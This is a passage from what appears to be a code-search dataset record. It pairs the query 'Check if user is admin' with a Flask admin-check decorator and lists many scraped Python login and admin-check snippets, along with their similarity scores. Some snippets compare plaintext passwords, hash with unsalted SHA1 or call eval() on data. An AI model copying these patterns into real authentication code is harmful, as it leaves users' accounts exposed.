username)):\n return True\n else:\n return False\n elif provider == 'congstar':\n return True", "def is_logged_in() -> bool:\n is_dev_login_disabled = SETTINGS.DEV_LOGIN_DISABLED and is_localhost()\n return bool(is_dev_login_disabled or is_logged_in_user())", "def login():", "def login():", "def login_check(self, username, password):\n can_login, msg = self.db.check_login(username, password)\n self.send_message(str(can_login) + DOLLAR + msg)", "def save_login(mobile):\n mobile = Mobile(mobile)\n ktt = KTT(mobile)\n ktt.gen_device_code()\n ktt.get_api_start()\n time.sleep(4)\n ktt.post_login()\n time.sleep(4)\n ktt.get_user_info()\n user_info = (\n ktt.user_info[\"uid\"], ktt.user_info[\"name\"], ktt.user_info[\"mobile\"],\n ktt.user_info[\"father\"], ktt.user_info[\"balance\"], ktt.user_info[\"coin\"],\n ktt.device_code, ktt.token, ktt.mobile.os, ktt.mobile.brand, ktt.mobile.mac,\n ktt.mobile.android_id\n )\n print(user_info)\n\n # save one user info record and one user flag\n uis.save([user_info])\n read_flag = [(user_info[0],)]\n uis.save_flag(read_flag)", "def is_logged_in():\n return 'user' in session", "def login_web_required(view_func):\r\n @wraps(view_func, assigned=available_attrs(view_func))\r\n def _wrapped_view_func(request, *args, **kwargs):\r\n if hasattr(request, \"session\") and request.session.get('is_logon', False) and request.user.is_active:\r\n return view_func(request, *args, **kwargs)\r\n else:\r\n return HttpResponse(FailResponse(u'请先登录'))\r\n return _wrapped_view_func", "def is_logged_in(self):\n return self.router.token is not None", "def login_auto(token: Token, mac_address: str) -> bool:\n device = Device.get_by_mac(mac_address)\n fail_msg = \"\"\n if device is None:\n fail_msg = \"No device with mac address exist\"\n elif Token.is_token_expired(device.token_expires):\n fail_msg = \"Token is expired\"\n elif token != device.token:\n fail_msg = \"Wrong token\"\n if fail_msg:\n client_logger_security().info(f\"Failed to login automatically: {fail_msg}\")\n return False\n else:\n _set_user_authenticated(device.user_id, device.device_id)\n client_logger_security().info(f\"Successfully logged in automatically: device_id={device.device_id}, \"\n f\"user_id={device.user_id}\")\n return True", "def check_user(cls, user):\n if user.mobile_phone and cls.contains_number(user.mobile_phone):\n return True\n\n if user.add_mobile_phone and cls.contains_number(user.add_mobile_phone):\n return True\n\n if user.landline_phone and cls.contains_number(user.landline_phone):\n return True\n\n if user.add_landline_phone and cls.contains_number(user.add_landline_phone):\n return True\n\n return False", "def if_user_isback_update_login_session(connection,user):\r\n with connection:\r\n return connection.execute(UPDATE_USER_LOGIN_STATUS_TO_TRUE, (user,))", "def check_user_logged():\n global user\n if 'user' not in session:\n return False\n else:\n user = session.get('user')\n return user['username'] != ''", "def login(self):\n url = self._root + self._routes[\"login\"]\n self.r = self.reqsession.get(url) \n if self.r.url == 'https://console.zerodha.com/dashboard':\n cookies = self.reqsession.cookies.get_dict('console.zerodha.com')\n self.console_session = cookies['session']\n self.public_token = self.reqsession.cookies['public_token']\n return True\n else:\n raise Exception(\"Login failed or Kite session expired\")", "def _can_login(self):\n return all([self.user.is_active, self.status, self.status_detail == \"active\"])", "def test_user_login_attempt_when_user_already_logged_in(self):\n\t\tpass", "def validate(self, data):\n user_type = 3\n return validate_login_user(self, data, user_type)", "def is_logged_in(session):\n if 'tid' in session:\n return {'success': 1, 'message': '你处于登录状态.', \n 'teamname': session['teamname'], 'is_zju_user': session['is_zju_user']}\n else:\n return {\"success\": 0, \"message\": \"你并未处于登录状态.\"}", "def mobile(self) -> Optional[str]:\n return pulumi.get(self, \"mobile\")", "def login():\n data = request.get_json()\n email = data.get('email')\n password = data.get('pwrd')\n user = SQLModel.get_by_attrs(('email', 'pwrd'), 'users', 'email', email)\n try:\n user_pw = user[0][1]\n user_nick = user[0][0]\n if password == user_pw:\n stuff = SQLModel.get_by_attrs(('login', 'pwrdHash', 'type', 'name'), 'users', 'login', login)\n return jsonify(stuff)\n else:\n return 'fail'\n except:\n return 'fail'", "def login(uname, password, db, session):\n\tquery = db((db.User.username == uname) & (db.User.password == password))\n\tif query.count() == 1:\n\t\tsession.auth = query.select().first().id\n\t\treturn True\n\telse:\n\t\treturn False", "def validate_mobile(self, mobile):\n self.mobile = mobile.strip()\n example = \"mobile number (ex. +2346787646)\"\n if re.match(r'(^[+0-9]{1,3})*([0-9]{10,11}$)',\n self.mobile) is None:\n raise GraphQLError(\n ERROR_RESPONSES[\"invalid_field_error\"].format(example))\n return self.mobile", "def login(self, returnToURL):\r\n\t\tif not self.request().hasValue('userId') or \\\r\n\t\t\tnot self.request().hasValue('password'):\r\n\t\t\tself.response().sendRedirect('/nova/login.psp?returnToURL=%s' % returnToURL)\r\n\t\t\treturn 0\r\n\t\treturn 1", "def login(self, email, password):\n url = \"https://mbasic.facebook.com\"\n self.get(url)\n email_element = self.find_element_by_name(\"email\")\n email_element.send_keys(email)\n pass_element = self.find_element_by_name(\"pass\")\n pass_element.send_keys(password)\n pass_element.send_keys(Keys.ENTER)\n if self.find_element_by_class_name(\"bi\"):\n self.find_element_by_class_name(\"bp\").click();\n try:\n self.find_element_by_name(\"xc_message\")\n log.debug(\"Logged in\")\n return True\n except NoSuchElementException as e:\n log.error(\"Failed to login\")\n return False", "def check_login(self, resp: ResponseContextManager) -> None:\n is_login_page = '__appianCsrfToken' in resp.cookies\n if resp.ok and is_login_page:\n self.login()\n elif not resp.ok:\n # Check login page actually returns a csrf token\n login_page_resp = self.get_page('/suite/', label=\"Login.LoadUi\", check_login=False)\n if login_page_resp.ok and '__appianCsrfToken' in login_page_resp.cookies:\n self.login()", "def login_core(self, usuario_model) -> bool:\n usuario_json = eval(json.dumps(usuario_model.__dict__))\n result = self.database.select_db(name_object=\"Usuario\", filter_data=usuario_json)\n if isinstance(result, object) and result is not None:\n Constant.USUARIO = self.encrypt.decrypt(eval(result[\"usuario\"]))\n return True\n return False", "def _check(self):\n if self.browser is None:\n self._init_browser()\n\n print(\"Checking if the browser can make login\")\n\n # Test 1: Should sign in using the form, signed should be True\n signed = self._sign_in()\n print(\"Finished, [signed = {}]\".format(signed))\n\n return signed", "def is_logged(html):\n soup = BeautifulSoup(html, \"html.parser\")\n\n if soup.find('div', {'id': 'user_information'}) is None:\n return False\n return True", "def check():\n req = requests.post('https://net.tsinghua.edu.cn/do_login.php',\n {'action': 'check_online'})\n print(req.text)\n if req.text != 'not_online':\n req = requests.post('https://net.tsinghua.edu.cn/rad_user_info.php')\n info = req.text.split(',')\n traffic = int(info[6]) / 1000000000\n timelen = int(info[2]) - int(info[1])\n timelen_str = '{}:{}:{}'.format(\n timelen // 3600,\n timelen // 60 % 60,\n timelen % 60)\n info_s = 'ip={0[8]},user={0[0]},traffic={1:.2f}GB,timelen={2}'\n info_s = info_s.format(info, traffic, timelen_str)\n print(info_s)", "def check_sc_login(text, exit_on_fail=True):\n if re.search(r'Login Required', text, re.I):\n print(\"!! Authentication Failed. Please login to System Center via your browser (%s), then try again.\" % (get_active_browser()))\n if exit_on_fail:\n sys.exit(220)\n else:\n return False\n else:\n return True", "def login(self, user_data):\n\n\t\tuser_data[\"password\"] = makeHash(user_data[\"password\"]);\n\n\t\tif self.db.request(\"getOne\", user_data):\n\t\t\treturn True;\n\t\telse:\n\t\t\treturn False;", "def login_check():\n\n user_email = request.form['email']\n user_password = request.form['password']\n\n # Check user info against database\n email_query = User.query.filter_by(email=user_email).first()\n if email_query == None:\n flash('Invalid email or password')\n return redirect('/')\n\n # Get user's id using email\n user_id = email_query.user_id\n\n # Valid user password\n if user_password == email_query.password:\n #create user session\n session['user'] = email_query.user_id\n return redirect('/user-%s' % user_id)\n else:\n flash('Invalid email or password')\n return redirect('/')", "def logged_in(self, use_page=None):\n # allow page soup to be passed as argument to make get_soup calling this function faster\n if use_page is None: soup = self.get_soup(\"overview\")\n else: soup = use_page\n\n found = soup.find(\"meta\", {\"name\": \"ogame-player-name\"})\n if found is None: return False\n if str(found[\"content\"]) == self.username: return True", "def authenticate_user(data):\n \n try:\n auth_token = data[\"auth_token\"]\n user_token = Token.objects.get(username=data[\"username\"])\n if user_token.token == auth_token:\n return True\n except:\n return False\n return False", "def default_login_works(self):\n return True if self.default_login_auth_header else False", "def login_user(username,password):\n \n check_user = Records.verify_user(username,password)\n return check_user", "def validate_login(self, username, password):\n user = User(self).get(username)\n return user and user['Password'] == password", "def check_login(db, useremail, password):\n import hashlib\n\n cursor = db.cursor().execute('SELECT password FROM users WHERE email IS ?', [useremail])\n result = cursor.fetchone()\n if result:\n return result[0] == hashlib.sha1(password.encode()).hexdigest()\n return False", "def usercheck(userip):\n if userip in session:\n return userstate.check(session[userip])\n else:\n return False", "def earthdata_login(uid=None, pwd=None, email=None, s3token=False) -> bool:\n\n try:\n url = \"urs.earthdata.nasa.gov\"\n mock_uid, _, mock_pwd = netrc.netrc(netrc).authenticators(url)\n except:\n\n mock_uid = os.environ.get(\"EARTHDATA_USERNAME\")\n mock_pwd = os.environ.get(\"EARTHDATA_PASSWORD\")\n\n if (uid == mock_uid) & (pwd == mock_pwd):\n return True\n else:\n return False", "def check_login(self, u, p):\r\n\t\tlogger.debug(\"Entering\")\r\n\t\t\r\n\t\ttry:\r\n\t\t\tval = login.validate_user(u, p)\r\n\t\texcept ValueError as e:\r\n\t\t\tlogger.debug(\"Exiting - failure\")\r\n\t\t\treturn False, e.message\r\n\t\t\r\n\t\tif val:\r\n\t\t\tlogger.debug(\"Exiting - success\")\r\n\t\t\treturn True, \"Login successful!\"\r\n\t\telse:\r\n\t\t\tlogger.debug(\"Exiting - failure\")\r\n\t\t\treturn False, \"Login failed.\"", "def details_not_matching():\n print(\"login details don't match.\")", "def login_user(self, input_email, input_password):\n logging_user_details = self.check_email_for_login(input_email)\n if BCRYPT.check_password_hash(logging_user_details['password'],\n input_password):\n # compare password input to saved password\n return logging_user_details\n return False", "def connectPhone(self):\n value = os.popen(self.checkPhone)\n\n for data in value.readline():\n sDate = str(data)\n if sDate.find(\"device\"):\n return True\n return False", "def valid_login(username: str, password: str):\n\n try:\n LoginHandler.login(username, password)\n global validLogin\n validLogin = True\n except:\n validLogin = False", "def login(self) -> int:\n r = self.session.post(\n self.api_endpoint,\n data={\n \"action\": \"login\",\n \"lgname\": self.user,\n \"lgpassword\": self.password,\n \"format\": \"json\",\n },\n )\n token = json.loads(r.text)[\"login\"][\"token\"]\n r = self.session.post(\n self.api_endpoint,\n data={\n \"action\": \"login\",\n \"lgname\": self.user,\n \"lgpassword\": self.password,\n \"lgtoken\": token,\n \"format\": \"json\",\n },\n )\n if json.loads(r.text)[\"login\"][\"result\"] != \"Success\":\n return -1\n return 0", "def CheckLogin(self) :\n url = Judge.UrlStatus + 'contestId=1&search=true&firstId=-1&lastId=-1&handle=' + self.username\n logging.info(\"open_url %s\" % url)\n req = urllib2.Request(url, headers=Judge.Headers)\n rsp = self.opener.open(req)\n res = None\n if rsp :\n res = rsp.read()\n #wf(\"CheckLogin_\", res)\n result = self.__parse_result(None, res, need_extra_info=False)\n if result and result.has_key('origin_runid') :\n #print \"CheckLogin last_submit_time{%s}END\" % result['_submit_time']\n self.last_runid = result['origin_runid']\n return res and res.find(r'<a href=\"/onlinejudge/login.do\">Login</a>') == -1", "def checkSession(self):\r\n\r\n app_settings = QSettings(conf_parser.get(\"APP\", \"name\"))\r\n end_date_time = app_settings.value(\"EndDateTime\", type=QDateTime)\r\n cur_date_time = QDateTime.currentDateTime()\r\n if(cur_date_time.secsTo(end_date_time) > 0):\r\n # get values from app_settings\r\n gl_content.auth_email = app_settings.value(\"Email\")\r\n gl_content.auth_user_company = app_settings.value(\"UserCompany\")\r\n gl_content.auth_first_name = app_settings.value(\"FirstName\")\r\n gl_content.auth_last_name = app_settings.value(\"LastName\")\r\n gl_content.auth_user_sys_id = app_settings.value(\"UserSysId\")\r\n gl_content.auth_password = app_settings.value(\"Password\")\r\n \r\n # decrypt password\r\n bytes_password = bytes(gl_content.auth_password)\r\n gl_content.auth_password = crypt.decrypt(bytes_password)\r\n\r\n # make login request\r\n # get mac address\r\n mac_addr = uuid.getnode()\r\n if(not mac_addr):\r\n self.accept()\r\n return\r\n \r\n # configure data\r\n data = QtCore.QByteArray()\r\n data.append(\"username={}&\".format(gl_content.auth_email))\r\n data.append(\"appVersion={}&\".format(conf_parser.get(\"APP\", \"version\")))\r\n data.append(\"appID={}&\".format(conf_parser.get(\"APP\", \"id\")))\r\n data.append(\"machineID={}&\".format(mac_addr))\r\n data.append(\"password={}\".format(gl_content.auth_password))\r\n \r\n # send request\r\n request = QtNetwork.QNetworkRequest(QtCore.QUrl(conf_parser.get(\"URLs\", \"auth\")))\r\n request.setHeader(QtNetwork.QNetworkRequest.ContentTypeHeader,'application/x-www-form-urlencoded')\r\n self.networkAccessManager.post(request, data)\r\n \r\n # start timer\r\n self.lb_msg.setText(\"Logging in to the server ...\")\r\n self.login_timer.start(200)\r\n self.pros = 0\r\n else:\r\n self.accept()", "def check_login_result(self, result):\n success_flag = \"成功登陆\"\n m = re.search(success_flag, result)\n if m is not None:\n print \"Login successfully!\"\n # Store the auth cooie into file\n self.mycookie.store_cookie()\n \n # Get the column\n option_flag = '<option\\svalue=\"(.*)\">(.*)</option>'\n return self.get_post_data(self.article_add_url, self.login_send_header, option_flag)\n else:\n print \"Login failed!\"\n return False", "def on_login(self, username):", "def on_login(self, username):", "def verify_password_student(mobile_or_token, password):\n\n # try with token\n student = Student.verify_auth_token(mobile_or_token)\n\n # if auth failed\n if not student:\n\n # try with mobile/password\n student = Student.query.filter_by(MOBILE=mobile_or_token).first()\n\n # if mobile not in db or in db but password doesn't match\n if not student or not student.verify_password(password):\n return False\n\n # set current user if succeeded and return success\n g.user = student\n return True", "def is_registered(self):\n if self.user == getpass.getuser():\n return True\n else:\n return False", "def logged_in():\n\n if current_user.is_authenticated:\n return True\n\n return False", "def login(self, device_name):\n try:\n device = next((item for item in self.host_dict if item.get('hostname') == device_name))\n except StopIteration:\n self.err_str = f\"Exception occurred. Please check hostname \\\"{device_name}\\\". Skipping back up\"\n backup_logger.exception(self.err_str)\n return\n backup_logger.info(f\"Logging into {device['host']}\")\n hostname = device.pop(\"hostname\")\n logged_in = False\n try:\n self.session = ConnectHandler(**device)\n if 'secret' in device:\n self.session.enable()\n self.current_device = device_name\n self.connected_devices.append(device)\n logged_in = True\n except (AuthenticationException, SSHException) as e:\n self.err_str = f\"Exception '{e}' occurred. \" \\\n f\"SSH is unsuccessful for device {hostname}. Skipping back up\"\n backup_logger.exception(self.err_str)\n # sys.exit()\n\n return logged_in\n # self.session = ConnectHandler(**device)", "def ismobile(number):\n if number[0] in ['7', '8', '9']:\n return True\n return False", "def do_login_login():\n print(inspect.stack()[1][3])\n print(request.form)\n query = select([User]).where(and_(User.columns.email == request.form['email'],User.columns.password==request.form['password'] ))\n ResultProxy = connection.execute(query)\n ResultSet = ResultProxy.fetchone()\n if ResultSet:\n session['logged_in'] = True\n else:\n flash('wrong password!')\n # return str(get_flashed_messages())\n return home(result)", "def check_user(used_name, used_password):\n user_exists = UserData.user_login(used_name, used_password)\n\n return user_exists", "def isLoggedIn(self):\n session = self.getSession()\n if session is not None:\n return True\n return False", "def the_browser_is_open_the_freenas_url_and_logged_in(driver, nas_ip, root_password):\n if nas_ip not in driver.current_url:\n driver.get(f\"http://{nas_ip}\")\n assert wait_on_element(driver, 10, '//input[@data-placeholder=\"Username\"]')\n if not is_element_present(driver, '//mat-list-item[@ix-auto=\"option__Dashboard\"]'):\n assert wait_on_element(driver, 10, '//input[@data-placeholder=\"Username\"]')\n driver.find_element_by_xpath('//input[@data-placeholder=\"Username\"]').clear()\n driver.find_element_by_xpath('//input[@data-placeholder=\"Username\"]').send_keys('root')\n driver.find_element_by_xpath('//input[@data-placeholder=\"Password\"]').clear()\n driver.find_element_by_xpath('//input[@data-placeholder=\"Password\"]').send_keys(root_password)\n assert wait_on_element(driver, 5, '//button[@name=\"signin_button\"]')\n driver.find_element_by_xpath('//button[@name=\"signin_button\"]').click()\n else:\n assert wait_on_element(driver, 10, '//mat-list-item[@ix-auto=\"option__Dashboard\"]', 'clickable')\n driver.find_element_by_xpath('//mat-list-item[@ix-auto=\"option__Dashboard\"]').click()", "def is_valid_login(self, username, password):\n\t\treturn self._send_command_to_entity_server(us.SERVER_COMMAND_IS_LOGIN_INFORMATION_VALID, username + '|' + password)", "def login(self,username,password):\n try:\n userNameField = self.driver.findElement(element = self.locators.lblUsernameField, elementType = \"id\", timeout = \"4\")\n if not userNameField:\n return False\n\n userNameField.click()\n userNameField.send_keys(username)\n time.sleep(self.waitShort)\n passwordField = self.driver.findElement(element = self.locators.lblPasswordField, elementType = \"id\", timeout = \"4\")\n if not passwordField:\n return False\n\n passwordField.click()\n passwordField.send_keys(password)\n time.sleep(self.waitShort)\n\n signIn = self.driver.findElement(element = self.locators.signIn, elementType = \"id\", timeout = \"4\")\n if not signIn:\n return False\n\n signIn.click()\n time.sleep(self.waitLong)\n #handler for No Thanks pop-up\n noThanks = self.driver.findElement(element = self.locators.btnNoThanks, elementType = \"id\", timeout = \"4\")\n if noThanks:\n noThanks.click()\n return True\n except Exception as exp:\n print \"Error in login(): {}\".format(exp)\n return False\n return True", "def is_logged_in(session):\n return 'user' in session" ]
[ "0.6898011", "0.689399", "0.6369667", "0.635195", "0.63429105", "0.63109106", "0.62703073", "0.6228723", "0.62186426", "0.6195903", "0.6157435", "0.61390567", "0.6046515", "0.60213834", "0.5956583", "0.59477335", "0.5935797", "0.5915573", "0.58781195", "0.58594924", "0.58545065", "0.5844821", "0.58345634", "0.5815404", "0.5740041", "0.57194996", "0.5712774", "0.56821424", "0.56702864", "0.56501263", "0.5641082", "0.5639972", "0.56349766", "0.56207985", "0.56196487", "0.56122655", "0.559915", "0.5572023", "0.5565744", "0.5559303", "0.5559303", "0.5553387", "0.55425876", "0.5535613", "0.5530373", "0.5527646", "0.5524359", "0.5519153", "0.5518919", "0.5516539", "0.5512466", "0.55121666", "0.5505517", "0.5484138", "0.5477298", "0.5476916", "0.5476521", "0.547006", "0.5469212", "0.5465067", "0.54592633", "0.54486054", "0.54400724", "0.5438683", "0.54356325", "0.5421263", "0.54169667", "0.5415251", "0.5395401", "0.53892857", "0.538205", "0.53776604", "0.53732276", "0.53697246", "0.53634596", "0.53615355", "0.5360588", "0.5354252", "0.5354074", "0.5352828", "0.5338414", "0.53364915", "0.53337073", "0.5325875", "0.53232384", "0.5321441", "0.53195566", "0.53195566", "0.5317524", "0.531629", "0.5313517", "0.5313131", "0.5308204", "0.53064245", "0.5303523", "0.5299893", "0.52995163", "0.5292093", "0.52898794", "0.5284045" ]
0.6534018
2
Check if user is admin
def require_admin(func): @wraps(func) def decorator(*args, **kwargs): if not g.user: # flash('此操作需要登录账户') return redirect(url_for('admin.login')) if g.user.name != 'admin': abort(403) return func(*args, **kwargs) return decorator
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def user_is_admin(user):\n return user in admins", "def is_admin(user):\n return user.is_authenticated and user.id == app.config.get('ADMIN')", "def is_admin(self, user):\n return user.name in self.admins", "def is_admin_user(self):\n if \"is_admin\" in self._properties and self.is_admin == 'YES':\n return True\n return False", "def isAdmin(user):\n return isUserType(user, Admin)", "def isAdmin():\n\tif 'username' in session and session['username'] == 'admin':\n\t\treturn True\n\telse:\n\t\treturn False", "def isAdmin(self, user):\r\n if user.id in self.admins:\r\n return True\r\n return False", "def check_admin() -> bool:\n return ctypes.windll.shell32.IsUserAnAdmin() == 1", "def is_admin(self):\n if not self.current_user:\n return False\n else:\n return self.current_user in [\"1\"]", "def admin_flag(user_id):\n user = User.query.filter_by(id=user_id).first()\n if user.is_admin:\n return True\n return False", "def check_is_admin(current_user):\n return current_user['isAdmin'] == True", "def is_user_admin(request):\n return request.user.is_superuser", "def is_admin(self,user):\n if user.is_superuser:\n return True\n\n if user.groups.filter(name=self.admin_group_name).count() > 0:\n return True\n else:\n return False", "def is_admin(ctx) -> bool:\n return db.user(ctx.author).is_admin", "def check_admin():\r\n if not current_user.is_admin:\r\n abort(403)", "def check_admin():\n if not current_user.is_admin:\n abort(403)", "def check_admin():\n if not current_user.is_admin:\n abort(403)", "def is_admin():\n user = users.get_current_user()\n if user:\n if users.is_current_user_admin() or is_local_admin():\n return 'Yes, you are admin'\n else:\n return \"No, you don't admin\"\n else:\n return \"You not logged in\"", "def check_admin():\n\tif not current_user.is_admin:\n\t\tabort(403)", "def is_admin(self):\r\n return self.admin", "def get_is_admin(self, obj):\n try:\n user = self.context.get('request').user\n except Exception:\n # raise serializers.ValidationError('Could not access request.user')\n return False\n if user == obj.admin:\n return True\n else:\n return False", "def is_admin(self):\n if self.user is None:\n return False\n if unicode(self.user._id) in self.barcamp.admins:\n return True\n if self.user.is_admin:\n return True\n return False", "def is_admin(self):\n return self.admin", "def is_user_admin(self, user):\n return user == self.created_by", "def is_current_user_admin():\n return (os.environ.get('USER_IS_ADMIN', '0')) == \"1\"", "def check_admin(self, user: TelegramController.User = None, id: str = None):\n\n if id == None:\n id = user.id\n\n return md5((str(id) + \"admin\").encode()).hexdigest() in self.__admins", "def is_admin(user):\n return user.groups.filter(name='Profesores').exists()", "def is_admin(username: str) -> bool:\n db = get_db()\n return int(db.get_user_by_name(username)[\"is_admin\"]) == 1", "def user_is_admin(userobj):\n from .node import Node\n from .subject import Subject\n from .period import Period\n from .assignment import Assignment\n return user_is_basenodeadmin(userobj, Node, Subject, Period, Assignment)", "def is_not_admin(user):\n return not user.is_superuser", "def is_admin(self) -> bool:\n return self._is_admin", "def is_admin(self, user) -> bool:\n return (\n user.is_superuser\n or user.groups.filter(pk=self.admins_group.pk).exists()\n )", "def is_admin():\n # TODO(felipemonteiro): Make this more robust via a context is admin\n # lookup.\n return CONF.patrole.rbac_test_role == CONF.identity.admin_role", "def is_admin(self):\n return self._is_admin", "def is_admin(self):\n return self._is_admin", "def is_admin(self, username):\n con = dbcon()\n cur = con.cursor()\n cur.execute(\"SELECT * FROM my_users WHERE username=%(username)s\",\\\n {\"username\":username})\n res = cur.fetchone()\n if res[5].lower() == 'admin':\n return True\n return False", "def is_main_admin(self):\n if self.user is None:\n return False\n return self.user.has_permission(\"admin\")", "def admin(self):\n if self.is_admin:\n return True\n return False", "def _check_admin_only(self, request):\r\n api_key = request.params.get(self.api_field, None)\r\n\r\n if request.user is None:\r\n user = self.user_fetcher(api_key=api_key)\r\n else:\r\n user = request.user\r\n\r\n if user is not None and user.is_admin:\r\n request.user = user\r\n return True", "def admin_user_exists(self):\n try:\n User.objects.get(username='admin')\n except User.DoesNotExist:\n return False\n\n return True", "def is_admin(self):\n return False", "def is_admin(user):\n return get_organisations_as_admin(user).count() > 0", "def is_admin(self, username): #WORKS\n done = self.cur.execute(\"SELECT username FROM admins WHERE username=\\\"{}\\\"\".format(username))\n if done == 0: # If query is unsuccessful, username is not an administrator.\n return False\n else:\n return True", "def is_admin():\n if platform_is(WINDOWS):\n return windll.shell32.IsUserAnAdmin()\n return os.getuid() == 0", "def is_admin(context):\n request = context[\"request\"]\n url = resolve(request.path)\n context['is_admin'] = False\n return url.app_name == 'admin'", "def is_admin(self):\n if self.type == 1:\n return True\n else:\n return False", "def is_admin(self, user):\n return (acl.action_allowed(self.request, 'OperatorDashboard', '*') or\n acl.action_allowed(self.request, 'Feed', 'Curate'))", "def check_admin(self, *args, **kwargs):\n if not users.is_current_user_admin():\n self.response.write(\n '<div style=\"padding-top: 200px; height:178px; width: 500px; color: white; margin: 0 auto; font-size: 52px; text-align: center; background: url(\\'http://3.bp.blogspot.com/_d_q1e2dFExM/TNWbWrJJ7xI/AAAAAAAAAjU/JnjBiTSA1xg/s1600/Bank+Vault.jpg\\')\">Forbidden Access <a style=\\'color: white;\\' href=\\'%s\\'>Login</a></div>' %\n users.create_login_url(self.request.path_url + self.request.query_string))\n return\n else:\n return handler(self, *args, **kwargs)", "def is_admin(self):\n if self.is_main_admin:\n return True\n if self.user is not None and self.barcamp is not None:\n if unicode(self.user._id) in self.barcamp.admins:\n return True\n return False", "def check_is_admin(context):\n init()\n\n #the target is user-self\n credentials = context.to_dict()\n target = credentials\n\n return policy.check('context_is_admin', target, credentials)", "def check_is_admin(self, wormhole: str, user: int):\n query = \"SELECT 1 FROM wormhole_admin WHERE name = ? AND admin = ?\"\n query_res = self.bot.db_query(query, (wormhole, user))\n return len(query_res) > 0", "async def is_admin(ctx):\n member = ctx.message.author\n aRole = discord.utils.get(member.guild.roles, name=ROLE_AD)\n if aRole in member.roles or member.id == 715048392408956950: return True", "def validate_admin(self, request):\n\n self.validate_login(request)\n\n if request.session['id'] not in self.admins:\n handler.logHelper.log_it_visit(request, __name__ + '.validate_admin', authorized=False)\n raise PermissionDenied('You need to be an admin to access this page.')", "def be_admin(username):\n user_data = my_users.get(username)\n if not user_data or 'admin' not in user_data.get('roles', []):\n return \"User does not have admin role\"", "def check_is_admin(context):\n\n init()\n # the target is user-self\n target = default_target(context)\n return _ENFORCER.authorize('context_is_admin', target, context)", "def test_is_admin_user(self):\n admin = User.objects.get(email='testadminuser@test.com')\n self.assertEqual(admin.is_staff, True)", "def is_admin(self) -> bool:\n\n return current_app.config[\"AUTH_ROLE_ADMIN\"] in [\n role.name for role in self.get_user_roles()\n ]", "def check_admin_session(self):\n for session in vms.get_vm_sessions(vm_name=self.vm_name):\n if (\n session.get_console_user()\n and\n session.get_user().get_user_name().startswith(\"admin\")\n ):\n return True\n return False", "def is_admin(self):\n return Role.query.get(2) in self.roles", "def is_admin(author):\n if str(author).lower() in config[\"admins\"]:\n return True\n return False", "def check_is_admin(context):\n init()\n credentials = context.to_policy_values()\n target = credentials\n return _ENFORCER.authorize('admin_required', target, credentials)", "def check_is_admin(cookie):\n return ';admin=true;' in cookie", "def is_administrator(self):\n return False", "async def assert_user_is_admin(auth: Auth, requester: Requester) -> None:\n is_admin = await auth.is_server_admin(requester)\n if not is_admin:\n raise AuthError(HTTPStatus.FORBIDDEN, \"You are not a server admin\")", "def isAdmin(self, nick):\n\t\tif nick in self.config[\"admins\"]:\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False", "def test_func(self, user):\n return self.get_object().admin == user", "def is_user_cloud_admin(self):\n user = users.get_current_user()\n if not user:\n return False\n try:\n user_info = self.get_by_id(UserInfo, user.email())\n if user_info:\n return user_info.is_user_cloud_admin\n else:\n return False\n except Exception as err:\n logging.exception(err)\n return False", "def is_superuser(self):\n sesh = self.get_session()\n return sesh.curr_role == 'admin'", "def user_is_nodeadmin(userobj):\n from .node import Node\n return user_is_basenodeadmin(userobj, Node)", "def is_admin():\n # type: () -> bool\n current_os_name = os.name\n\n # Works with XP SP2 +\n if current_os_name == \"nt\":\n try:\n return IsUserAnAdmin()\n except Exception:\n raise EnvironmentError(\"Cannot check admin privileges\")\n elif current_os_name == \"posix\":\n # Check for root on Posix\n # os.getuid only exists on postix OSes\n # pylint: disable=E1101 (no-member)\n return os.getuid() == 0\n else:\n raise EnvironmentError(\n \"OS does not seem to be supported for admin check. OS: {}\".format(\n current_os_name\n )\n )", "def user_is_admin_or_superadmin(userobj):\n if userobj.is_superuser:\n return True\n else:\n return user_is_admin(userobj)", "def validateUser(self,admin):\n \n res=admin.helper.getOneUser(self.name)\n if res == False:\n return True\n else:\n return False", "def is_superuser(self):\n return self.is_admin", "def test_admin(self):\r\n \r\n self.assertEqual(False, self.user.isAdmin)", "def admin(ctx):\n return ctx.message.author.permissions_in(ctx.channel).administrator", "def admin(request):\n if not request.user.is_staff:\n return render_to_response('error.htm', {\n 'error': \"Sorry, you are not staff... (user permissions 'is_staff')\",\n })\n return render_to_response('admin.htm', {\n 'username': request.user,\n })", "def is_administrator(self):\n return self.can(Permission.ADMIN)", "def is_administrator(self):\n return self.can(Permission.ADMIN)", "def GET_adminon(self):\r\n #check like this because c.user_is_admin is still false\r\n if not c.user.name in g.admins:\r\n return self.abort404()\r\n self.login(c.user, admin = True)\r\n\r\n dest = request.referer or '/'\r\n return self.redirect(dest)", "def is_accessible(self):\n return current_user.is_authenticated and current_user.role == 'admin'", "def is_accessible(self):\n return current_user.is_authenticated and current_user.role == 'admin'", "def is_staff(self):\r\n return self.is_admin", "def admin_required(handler):\n def admin_login(self, *args, **kwargs):\n auth = self.auth\n if not auth.get_user_by_session():\n self.redirect('/auth/login', abort=True)\n \n user = auth.get_user_by_session()\n queried_entity = User.get_by_id(user['user_id'])\n \n if queried_entity and queried_entity.phb_user_admin_status == 'admin-1':\n return handler(self, *args, **kwargs)\n else:\n self.redirect('/', abort = True)\n \n return admin_login", "def is_admin(func):\n\n @wraps(func)\n def decorated_function(*args, **kwargs):\n from .base_validator import ValidationError\n user = request.user\n if user.is_admin == IsAdmin.yes:\n return func(*args, **kwargs)\n raise ValidationError(\n {'message': 'You are not authorized to access this page'},\n 403\n )\n\n return decorated_function", "def IsCorpUserOrAdmin(self):\n user_email = auth_util.GetUserEmail()\n return ((user_email and user_email.endswith('@google.com')) or\n auth_util.IsCurrentUserAdmin())", "def login_as_admin():\n users.loginAsUser(\n config.VDC_ADMIN_USER, config.VDC_ADMIN_DOMAIN,\n config.VDC_PASSWORD, filter=False\n )\n return True", "def is_administrator(self):\n return self.rol == ProfileRoles.ADMINISTRATOR or self.user.is_staff", "def user_is_assignmentadmin(userobj):\n from .assignment import Assignment\n return user_is_basenodeadmin(userobj, Assignment)", "def is_admin(self, is_admin):\n\n self._is_admin = is_admin", "def get_editable(self, user):\n return user.get('role') == 'admin'", "async def assert_requester_is_admin(auth: Auth, request: SynapseRequest) -> None:\n requester = await auth.get_user_by_req(request)\n await assert_user_is_admin(auth, requester)", "def can_edit_user(user):\n\tu = current_user._get_current_object()\n\treturn u==user or u.is_admin()", "def user_is_periodadmin(userobj):\n from .period import Period\n return user_is_basenodeadmin(userobj, Period)", "def get_is_admin():\n 